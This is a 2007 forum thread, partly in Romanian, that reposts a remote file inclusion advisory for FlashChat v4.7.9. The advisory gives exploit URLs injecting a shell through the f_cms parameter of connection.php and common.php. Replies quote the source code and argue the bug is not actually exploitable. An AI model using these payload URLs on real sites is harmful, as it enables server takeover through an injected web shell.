Gonzalez Posted May 28, 2007 Report Posted May 28, 2007 Discovered By Hasadya RaedContact : RaeD (at) BsdMail (dot) Com [email concealed]--------------------------Script : FlashChat_v479Download : files.filefront.com/FlashChat+v479rar/;7192354;/fileinfo.html--------------------------B.Files : connection.php >Require_once($f_cms); common.php > Require_once($f_cms); --------------------------Exploits : http://www.Victim.com/chat/incclasses/connection.php?f_cms=[shell-Attack]http://www.Victim.com/chat/inc/common.php?f_cms=[shell-Attack] Quote
kw3rln Posted May 28, 2007 Report Posted May 28, 2007 Discovered By Hasadya RaedContact : RaeD (at) BsdMail (dot) Com [email concealed]--------------------------Script : FlashChat_v479Download : files.filefront.com/FlashChat+v479rar/;7192354;/fileinfo.html--------------------------B.Files : connection.php >Require_once($f_cms); common.php > Require_once($f_cms); --------------------------Exploits : http://www.Victim.com/chat/incclasses/connection.php?f_cms=[shell-Attack]http://www.Victim.com/chat/inc/common.php?f_cms=[shell-Attack]codul:in common.php//if ($GLOBALS['fc_config']['CMSsystem'] == 'phpBB2CMS') { //---CMS $f_cms = INC_DIR . 'cmses/' . $GLOBALS['fc_config']['CMSsystem'] . '.php'; if( !file_exists($f_cms) || !is_file($f_cms) ) require_once(INC_DIR . 'cmses/statelessCMS.php');//free for all users else require_once( $f_cms ); //---end CMS } f_cms ii declarat !nu-i vurnerabil iar in connection.php nu exista variabila aia : Quote
Guest flama Posted May 28, 2007 Report Posted May 28, 2007 poate ai downloadat versiunea patchuita .... pe de alta parte poate omu care a facut disclose la ea e un complete idiot Quote
kw3rln Posted May 29, 2007 Report Posted May 29, 2007 poate ai downloadat versiunea patchuita .... pe de alta parte poate omu care a facut disclose la ea e un complete idiot am luat versiunea care o puso omu!Download : files.filefront.com/FlashChat+v479rar/;7192354;/fileinfo.html Quote
